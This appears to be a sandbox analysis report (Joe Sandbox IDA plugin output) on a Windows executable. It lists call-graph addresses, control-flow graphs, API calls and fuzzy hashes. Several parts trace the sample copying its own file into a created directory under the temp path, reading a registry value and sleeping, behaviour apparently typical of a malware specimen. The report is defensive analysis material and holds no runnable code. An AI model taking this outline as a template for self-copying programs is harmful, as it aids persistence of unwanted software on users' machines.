21112 1e036f 21111->21112 21113 1dbf20 21111->21113 21146 1ddcaf 21112->21146 21117 1e0707 GetEnvironmentStringsW 21113->21117 21118 1e071e 21117->21118 21119 1e0774 21117->21119 21122 1e0623 __wsopen_s WideCharToMultiByte 21118->21122 21120 1e077d FreeEnvironmentStringsW 21119->21120 21121 1dbf25 21119->21121 21120->21121 21121->21097 21129 1dbf60 21121->21129 21123 1e0737 21122->21123 21123->21119 21124 1dd7ea __wsopen_s 15 API calls 21123->21124 21125 1e0747 21124->21125 21126 1e075f 21125->21126 21127 1e0623 __wsopen_s WideCharToMultiByte 21125->21127 21128 1dd301 _free 14 API calls 21126->21128 21127->21126 21128->21119 21130 1dbf75 21129->21130 21131 1df5d6 _unexpected 14 API calls 21130->21131 21142 1dbf9c 21131->21142 21132 1dc001 21133 1dd301 _free 14 API calls 21132->21133 21134 1dbf36 21133->21134 21134->21102 21135 1df5d6 _unexpected 14 API calls 21135->21142 21136 1dc003 21292 1dc030 21136->21292 21138 1dca9c ___std_exception_copy 25 API calls 21138->21142 21140 1dd301 _free 14 API calls 21140->21132 21141 1dc023 21143 1db9ab __wsopen_s 11 API calls 21141->21143 21142->21132 21142->21135 21142->21136 21142->21138 21142->21141 21144 1dd301 _free 14 API calls 21142->21144 21145 1dc02f 21143->21145 21144->21142 21147 1ddcba 21146->21147 21148 1ddcc0 21146->21148 21150 1de133 _unexpected 6 API calls 21147->21150 21149 1de172 _unexpected 6 API calls 21148->21149 21152 1ddcc6 21148->21152 21151 1ddcda 21149->21151 21150->21148 21151->21152 21153 1df5d6 _unexpected 14 API calls 21151->21153 21154 1dca58 IsInExceptionSpec 37 API calls 21152->21154 21159 1ddd3f 21152->21159 21155 1ddcea 21153->21155 21156 1ddd48 21154->21156 21157 1ddd07 21155->21157 21158 1ddcf2 21155->21158 21161 1de172 _unexpected 6 API calls 21157->21161 21160 1de172 _unexpected 6 API calls 21158->21160 21171 1e01ad 21159->21171 21162 1ddcfe 21160->21162 21163 1ddd13 21161->21163 21168 1dd301 _free 14 API calls 21162->21168 21164 1ddd17 21163->21164 21165 1ddd26 21163->21165 21166 1de172 _unexpected 6 API calls 21164->21166 21167 1dda20 _unexpected 14 API calls 21165->21167 21166->21162 21169 1ddd31 21167->21169 21168->21152 21170 1dd301 _free 14 API calls 21169->21170 21170->21152 21172 1e02c6 __fassign 37 API calls 21171->21172 21173 1e01c0 21172->21173 21190 1dff55 21173->21190 21176 1e01d9 21176->21113 21177 1dd7ea __wsopen_s 15 API calls 21178 1e01ea 21177->21178 21179 1e021c 21178->21179 21197 1e03c1 21178->21197 21181 1dd301 _free 14 API calls 21179->21181 21183 1e022a 21181->21183 21183->21113 21184 1e0217 21185 1db4a2 __dosmaperr 14 API calls 21184->21185 21185->21179 21186 1e025e 21186->21179 21208 1dfe47 21186->21208 21187 1e0232 21187->21186 21188 1dd301 _free 14 API calls 21187->21188 21188->21186 21191 1da9fd __fassign 37 API calls 21190->21191 21192 1dff67 21191->21192 21193 1dff88 21192->21193 21194 1dff76 GetOEMCP 21192->21194 21195 1dff9f 21193->21195 21196 1dff8d GetACP 21193->21196 21194->21195 21195->21176 21195->21177 21196->21195 21198 1dff55 39 API calls 21197->21198 21199 1e03e1 21198->21199 21201 1e041b IsValidCodePage 21199->21201 21206 1e0457 ___scrt_fastfail 21199->21206 21200 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21202 1e020f 21200->21202 21203 1e042d 21201->21203 21201->21206 21202->21184 21202->21187 21204 1e045c GetCPInfo 21203->21204 21207 1e0436 ___scrt_fastfail 21203->21207 21204->21206 21204->21207 21206->21200 21216 1e002c 21207->21216 21209 1dfe53 CallCatchBlock 21208->21209 21266 1dcc03 EnterCriticalSection 21209->21266 21211 1dfe5d 21267 1dfe94 21211->21267 21217 1e0054 GetCPInfo 21216->21217 21218 1e011d 21216->21218 21217->21218 21224 1e006c 21217->21224 21219 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21218->21219 21221 1e01ab 21219->21221 21220 1e11d3 40 API calls 21222 1e00d4 21220->21222 21221->21206 21227 1e482e 21222->21227 21224->21220 21226 1e482e 41 API calls 21226->21218 21228 1da9fd __fassign 37 API calls 21227->21228 21229 1e4841 21228->21229 21232 1e4644 21229->21232 21233 1e465f 21232->21233 21234 1dd838 __fassign MultiByteToWideChar 21233->21234 21237 1e46a3 21234->21237 21235 1e4808 21236 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21235->21236 21238 1e00f5 21236->21238 21237->21235 21239 1dd7ea __wsopen_s 15 API calls 21237->21239 21242 1e46c8 __alloca_probe_16 21237->21242 21238->21226 21239->21242 21240 1dd838 __fassign MultiByteToWideChar 21243 1e470e 21240->21243 21241 1e12d6 __freea 14 API calls 21241->21235 21242->21240 21254 1e476d 21242->21254 21243->21254 21260 1de1ff 21243->21260 21246 1e4744 21249 1de1ff 6 API calls 21246->21249 21246->21254 21247 1e477c 21248 1dd7ea __wsopen_s 15 API calls 21247->21248 21251 1e478e __alloca_probe_16 21247->21251 21248->21251 21249->21254 21250 1e47f9 21253 1e12d6 __freea 14 API calls 21250->21253 21251->21250 21252 1de1ff 6 API calls 21251->21252 21255 1e47d6 21252->21255 21253->21254 21254->21241 21255->21250 21256 1e0623 __wsopen_s WideCharToMultiByte 21255->21256 21257 1e47f0 21256->21257 21257->21250 21258 1e4825 21257->21258 21259 1e12d6 __freea 14 API calls 21258->21259 21259->21254 21261 1dde78 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 21260->21261 21262 1de20a 21261->21262 21263 1de25c LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 21262->21263 21265 1de210 21262->21265 21264 1de250 LCMapStringW 21263->21264 21264->21265 21265->21246 21265->21247 21265->21254 21266->21211 21277 1de7bb 21267->21277 21269 1dfeb6 21270 1de7bb 25 API calls 21269->21270 21272 1dfed5 21270->21272 21271 1dfe6a 21274 1dfe88 21271->21274 21272->21271 21273 1dd301 _free 14 API calls 21272->21273 21273->21271 21291 1dcc4b LeaveCriticalSection 21274->21291 21276 1dfe76 21276->21179 21278 1de7cc 21277->21278 21286 1de7c8 __wsopen_s 21277->21286 21279 1de7d3 21278->21279 21282 1de7e6 ___scrt_fastfail 21278->21282 21280 1db4a2 __dosmaperr 14 API calls 21279->21280 21281 1de7d8 21280->21281 21283 1db97e __wsopen_s 25 API calls 21281->21283 21284 1de81d 21282->21284 21285 1de814 21282->21285 21282->21286 21283->21286 21284->21286 21289 1db4a2 __dosmaperr 14 API calls 21284->21289 21287 1db4a2 __dosmaperr 14 API calls 21285->21287 21286->21269 21288 1de819 21287->21288 21290 1db97e __wsopen_s 25 API calls 21288->21290 21289->21288 21290->21286 21291->21276 21293 1dc03d 21292->21293 21294 1dc009 21292->21294 21295 1dc054 21293->21295 21297 1dd301 _free 14 API calls 21293->21297 21294->21140 21296 1dd301 _free 14 API calls 21295->21296 21296->21294 21297->21293 21299 1d5760 27 API calls 21298->21299 21300 1c9cab 21299->21300 21301 1c2be0 42 API calls 21300->21301 21302 1c9cb6 GetTempPathA 21301->21302 21303 1c9cf8 21302->21303 21303->21303 21304 1d5ac0 27 API calls 21303->21304 21305 1c9d14 21304->21305 21306 1d5c10 27 API calls 21305->21306 21307 1c9d2a 21306->21307 21308 1d5760 27 API calls 21307->21308 21309 1c9dee 21308->21309 21310 1c2be0 42 API calls 21309->21310 21311 1c9df9 21310->21311 21312 1d5f90 27 API calls 21311->21312 21313 1c9e15 21312->21313 21314 1d5c10 27 API calls 21313->21314 21315 1c9e2a GetModuleFileNameA 21314->21315 21317 1c9f17 21315->21317 21317->21317 21318 1d5ac0 27 API calls 21317->21318 21319 1c9f33 21318->21319 21320 1ca111 21319->21320 21322 1ca1c4 21319->21322 21321 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21320->21321 21323 1ca131 21321->21323 21324 1db98e 25 API calls 21322->21324 21323->20967 21325 1ca1c9 21324->21325 21327 1c9826 21326->21327 21328 1c9af0 21327->21328 21330 1d5760 27 API calls 21327->21330 21329 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21328->21329 21332 1c9b06 21329->21332 21331 1c9845 21330->21331 21333 1c2be0 42 API calls 21331->21333 21352 1c9140 GetModuleFileNameA 21332->21352 21334 1c984c 21333->21334 21335 1d5760 27 API calls 21334->21335 21336 1c9864 21335->21336 21337 1c2be0 42 API calls 21336->21337 21338 1c986b 21337->21338 21380 1c2d10 21338->21380 21341 1d5760 27 API calls 21342 1c9898 21341->21342 21343 1c2be0 42 API calls 21342->21343 21344 1c98a3 21343->21344 21344->21328 21345 1c9b0a 21344->21345 21394 1d5c00 21345->21394 21353 1c91a6 21352->21353 21353->21353 21354 1d5ac0 27 API calls 21353->21354 21355 1c91c2 21354->21355 21356 1d5760 27 API calls 21355->21356 21357 1c9556 21356->21357 21358 1c2be0 42 API calls 21357->21358 21359 1c9561 21358->21359 21360 1d5760 27 API calls 21359->21360 21361 1c957a 21360->21361 21410 1c51e0 21361->21410 21364 1d5760 27 API calls 21365 1c959c 21364->21365 21366 1c2be0 42 API calls 21365->21366 21367 1c95a7 21366->21367 21368 1d5c10 27 API calls 21367->21368 21369 1c95bb 21368->21369 21370 1d5c10 27 API calls 21369->21370 21371 1c95cb 21370->21371 21372 1d5760 27 API calls 21371->21372 21373 1c95e9 21372->21373 21374 1c2be0 42 API calls 21373->21374 21375 1c95f0 21374->21375 21376 1d5ac0 27 API calls 21375->21376 21377 1c9613 21376->21377 21378 1db98e 25 API calls 21377->21378 21379 1c9782 21378->21379 21397 1d8380 21380->21397 21383 1c2d96 RegQueryValueExA 21384 1c2dc0 RegCloseKey 21383->21384 21385 1c2de6 21384->21385 21385->21385 21386 1d5ac0 27 API calls 21385->21386 21390 1c2dfe 21386->21390 21387 1c2e66 21388 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21387->21388 21391 1c2e89 21388->21391 21389 1c2e8d 21392 1db98e 25 API calls 21389->21392 21390->21387 21390->21389 21391->21341 21393 1c2e92 21392->21393 21399 1d6ca2 21394->21399 21398 1c2d67 RegOpenKeyExA 21397->21398 21398->21383 21398->21384 21404 1d6c16 21399->21404 21402 1d8133 Concurrency::cancel_current_task RaiseException 21403 1d6cc1 21402->21403 21407 1d6b37 21404->21407 21408 1d7ef8 ___std_exception_copy 26 API calls 21407->21408 21409 1d6b63 21408->21409 21409->21402 21419 1c5238 21410->21419 21420 1c534a 21410->21420 21411 1d5760 27 API calls 21411->21419 21412 1c2be0 42 API calls 21412->21419 21413 1c5380 21415 1d5c00 27 API calls 21413->21415 21414 1d5ac0 27 API calls 21414->21419 21416 1c5385 21415->21416 21417 1db98e 25 API calls 21416->21417 21418 1c538a 21417->21418 21419->21411 21419->21412 21419->21413 21419->21414 21419->21416 21419->21420 21420->21364 21510 1d6cd3 21521 1d6cfa InitializeCriticalSectionAndSpinCount GetModuleHandleW 21510->21521 21512 1d6cd8 21532 1d7193 21512->21532 21514 1d6cdf 21515 1d6ce4 21514->21515 21516 1d6cf2 21514->21516 21538 1d7320 21515->21538 21518 1d75c0 ___scrt_fastfail 4 API calls 21516->21518 21519 1d6cf9 21518->21519 21522 1d6d1d GetModuleHandleW 21521->21522 21523 1d6d2e GetProcAddress GetProcAddress 21521->21523 21522->21523 21524 1d6d74 21522->21524 21525 1d6d4c 21523->21525 21526 1d6d5e CreateEventW 21523->21526 21528 1d75c0 ___scrt_fastfail 4 API calls 21524->21528 21525->21526 21527 1d6d50 21525->21527 21526->21524 21526->21527 21527->21512 21529 1d6d7b DeleteCriticalSection 21528->21529 21530 1d6d97 21529->21530 21531 1d6d90 CloseHandle 21529->21531 21530->21512 21531->21530 21533 1d719f 21532->21533 21534 1d71a3 21532->21534 21533->21514 21535 1d75c0 ___scrt_fastfail 4 API calls 21534->21535 21537 1d71b0 ___scrt_release_startup_lock 21534->21537 21536 1d7219 21535->21536 21537->21514 21541 1d72f3 21538->21541 21542 1d7309 21541->21542 21543 1d7302 21541->21543 21550 1dc4bb 21542->21550 21547 1dc44f 21543->21547 21546 1d6cee 21548 1dc4bb 28 API calls 21547->21548 21549 1dc461 21548->21549 21549->21546 21553 1dc1f1 21550->21553 21554 1dc1fd CallCatchBlock 21553->21554 21561 1dcc03 EnterCriticalSection 21554->21561 21556 1dc20b 21562 1dc24c 21556->21562 21558 1dc218 21572 1dc240 21558->21572 21561->21556 21563 1dc268 21562->21563 21571 1dc2df _unexpected 21562->21571 21564 1dc2bf 21563->21564 21563->21571 21575 1e0af3 21563->21575 21565 1e0af3 28 API calls 21564->21565 21564->21571 21568 1dc2d5 21565->21568 21567 1dc2b5 21569 1dd301 _free 14 API calls 21567->21569 21570 1dd301 _free 14 API calls 21568->21570 21569->21564 21570->21571 21571->21558 21603 1dcc4b LeaveCriticalSection 21572->21603 21574 1dc229 21574->21546 21576 1e0b1b 21575->21576 21577 1e0b00 21575->21577 21579 1e0b2a 21576->21579 21584 1e4a0c 21576->21584 21577->21576 21578 1e0b0c 21577->21578 21580 1db4a2 __dosmaperr 14 API calls 21578->21580 21591 1e4a3f 21579->21591 21583 1e0b11 ___scrt_fastfail 21580->21583 21583->21567 21585 1e4a2c HeapSize 21584->21585 21586 1e4a17 21584->21586 21585->21579 21587 1db4a2 __dosmaperr 14 API calls 21586->21587 21588 1e4a1c 21587->21588 21589 1db97e __wsopen_s 25 API calls 21588->21589 21590 1e4a27 21589->21590 21590->21579 21592 1e4a4c 21591->21592 21593 1e4a57 21591->21593 21594 1dd7ea __wsopen_s 15 API calls 21592->21594 21595 1e4a5f 21593->21595 21602 1e4a68 _unexpected 21593->21602 21599 1e4a54 21594->21599 21596 1dd301 _free 14 API calls 21595->21596 21596->21599 21597 1e4a6d 21600 1db4a2 __dosmaperr 14 API calls 21597->21600 21598 1e4a92 HeapReAlloc 21598->21599 21598->21602 21599->21583 21600->21599 21601 1db9f9 _unexpected 2 API calls 21601->21602 21602->21597 21602->21598 21602->21601 21603->21574 21604 1d7422 21609 1d7725 SetUnhandledExceptionFilter 21604->21609 21606 1d7427 21610 1dc988 21606->21610 21608 1d7432 21609->21606 21611 1dc9ae 21610->21611 21612 1dc994 21610->21612 21611->21608 21612->21611 21613 1db4a2 __dosmaperr 14 API calls 21612->21613 21614 1dc99e 21613->21614 21615 1db97e __wsopen_s 25 API calls 21614->21615 21616 1dc9a9 21615->21616 21616->21608

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 304 1da651-1da65e call 1dcc62 307 1da680-1da68c call 1da693 ExitProcess 304->307 308 1da660-1da66e GetPEB 304->308 308->307 310 1da670-1da67a GetCurrentProcess TerminateProcess 308->310 310->307
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(001DDCAE,?,001DA650,001DABD6,?,001DDCAE,001DABD6,001DDCAE), ref: 001DA673
                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,001DA650,001DABD6,?,001DDCAE,001DABD6,001DDCAE), ref: 001DA67A
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 001DA68C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                      • Opcode ID: ccecb0c6e27132640d35713c4ff1842d69031bef3e6d31cf2d34634f7e03e7d5
                                                                                                                                                                                      • Instruction ID: 88dce411ecfd11ea56ba30426df7a82bff4e857c8178369b10b03ce5a31c76ee
                                                                                                                                                                                      • Opcode Fuzzy Hash: ccecb0c6e27132640d35713c4ff1842d69031bef3e6d31cf2d34634f7e03e7d5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EE0EC31000248EFCF12AFA4DD89A5D3BA9FF51741F4A4829F9058A631CB39EDC1CB96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 412 1d7725-1d7730 SetUnhandledExceptionFilter
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00017731,001D7427), ref: 001D772A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                      • Opcode ID: 30887cfada31b0718b6d5f3a55668567a398fd4141f973aeceea96dd5a0159d0
                                                                                                                                                                                      • Instruction ID: 4a5eac6b1982cb9ba1ea80177831d358c2851f27a0b96ad3927000c0c3cc63a8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 30887cfada31b0718b6d5f3a55668567a398fd4141f973aeceea96dd5a0159d0
                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(001F9708,00000FA0,?,?,001D6CD8), ref: 001D6D06
                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,001D6CD8), ref: 001D6D11
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,001D6CD8), ref: 001D6D22
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001D6D34
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001D6D42
                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,001D6CD8), ref: 001D6D65
                                                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 001D6D76
                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(001F9708,00000007,?,?,001D6CD8), ref: 001D6D81
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,001D6CD8), ref: 001D6D91
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 001D6D2E
                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 001D6D3A
                                                                                                                                                                                      • kernel32.dll, xrefs: 001D6D1D
                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 001D6D0C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                                                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                      • API String ID: 3578986977-3242537097
                                                                                                                                                                                      • Opcode ID: 6e98bc88dc335311a84296aefcc800f4d28b1d4f963abd1d2b79bd76d9fe6aa2
                                                                                                                                                                                      • Instruction ID: 42e8a243fd085cdff2ab91512aad4d293836e0ed94ec377c3f3bd1ada717a171
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e98bc88dc335311a84296aefcc800f4d28b1d4f963abd1d2b79bd76d9fe6aa2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4301D874751B505BDB203FF5BC49B6E36E9DB84B40B000112FA04D6AA0EB70C880CE61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 001E201A: CreateFileW.KERNELBASE(00000000,00000000,?,001E240A,?,?,00000000,?,001E240A,00000000,0000000C), ref: 001E2037
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 001E2475
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001E247C
                                                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 001E2488
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 001E2492
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001E249B
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E24BB
                                                                                                                                                                                      • CloseHandle.KERNEL32(001DD19E), ref: 001E2608
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 001E263A
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001E2641
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                                      • Opcode ID: 1ce2d0b0fbdb208d6016fe0e65f93f96194ac1ae168b5e45b5f961b3633dfb0b
                                                                                                                                                                                      • Instruction ID: 3b738b611a6eb6af5f73e0edea509598ecbdcff1d6f867a39ca536222ffb9e6b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce2d0b0fbdb208d6016fe0e65f93f96194ac1ae168b5e45b5f961b3633dfb0b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 95A10632A045848FCF1DEF68DCA17AE7BE5AB0A320F150159F802AF3D2CB759952CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 001C9EED
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?), ref: 001C9FEB
                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000), ref: 001CA00D
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?), ref: 001CA028
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CA159
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Attributes$CopyCreateDirectoryModuleName
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3597215635-0
                                                                                                                                                                                      • Opcode ID: 955c79fb80a43a98e02554eabf13f834ada0e1f323e7e727276dd85a4f5dd6fb
                                                                                                                                                                                      • Instruction ID: a2925f8fdcac0ef1b298efec9794dbd625f703fb112463e7d3e08378a6cb742c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 955c79fb80a43a98e02554eabf13f834ada0e1f323e7e727276dd85a4f5dd6fb
                                                                                                                                                                                      • Instruction Fuzzy Hash: F9B126B1A001588BEF28DB24CC99B9CB775AF61304F9041DCE609A72C2DB359FC48F66
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 140 1c3e80-1c3ee0 call 1d5f90 call 1d5d10 145 1c3f0e-1c3f8a call 1d5760 * 2 call 1c2be0 call 1d5ac0 call 1c3990 140->145 146 1c3ee2-1c3eee 140->146 171 1c3f8c-1c3f98 145->171 172 1c3fb8-1c3fbe 145->172 147 1c3f04-1c3f0b call 1d7335 146->147 148 1c3ef0-1c3efe 146->148 147->145 148->147 150 1c4047 call 1db98e 148->150 156 1c404c-1c411a call 1db98e call 1d5760 call 1c2be0 call 1d5d10 call 1d5760 call 1c2be0 call 1d5ac0 call 1c3990 150->156 201 1c411c-1c4128 156->201 202 1c4144-1c4155 Sleep 156->202 174 1c3fae-1c3fb5 call 1d7335 171->174 175 1c3f9a-1c3fa8 171->175 176 1c3fe8-1c4000 172->176 177 1c3fc0-1c3fcc 172->177 174->172 175->156 175->174 182 1c402a-1c4046 call 1d6cc2 176->182 183 1c4002-1c400e 176->183 180 1c3fde-1c3fe5 call 1d7335 177->180 181 1c3fce-1c3fdc 177->181 180->176 181->156 181->180 184 1c4020-1c4027 call 1d7335 183->184 185 1c4010-1c401e 183->185 184->182 185->156 185->184 205 1c413a-1c4141 call 1d7335 201->205 206 1c412a-1c4138 201->206 203 1c417f-1c4198 call 1d6cc2 202->203 204 1c4157-1c4163 202->204 207 1c4175-1c417c call 1d7335 204->207 208 1c4165-1c4173 204->208 205->202 206->205 210 1c4199 call 1db98e 206->210 207->203 208->207 212 1c419e-1c41ef call 1db98e call 1c35d0 208->212 210->212 222 1c41f1 212->222 223 1c41f3-1c4200 SetCurrentDirectoryA 212->223 222->223 224 1c422e-1c42e8 call 1d5760 call 1c2be0 call 1d5760 call 1c2be0 call 1d5d10 call 1d5c10 call 1d5760 call 1c2be0 call 1d5ac0 call 1c3990 223->224 225 1c4202-1c420e 223->225 257 1c42ea-1c42f6 224->257 258 1c4316-1c432e 224->258 226 1c4224-1c422b call 1d7335 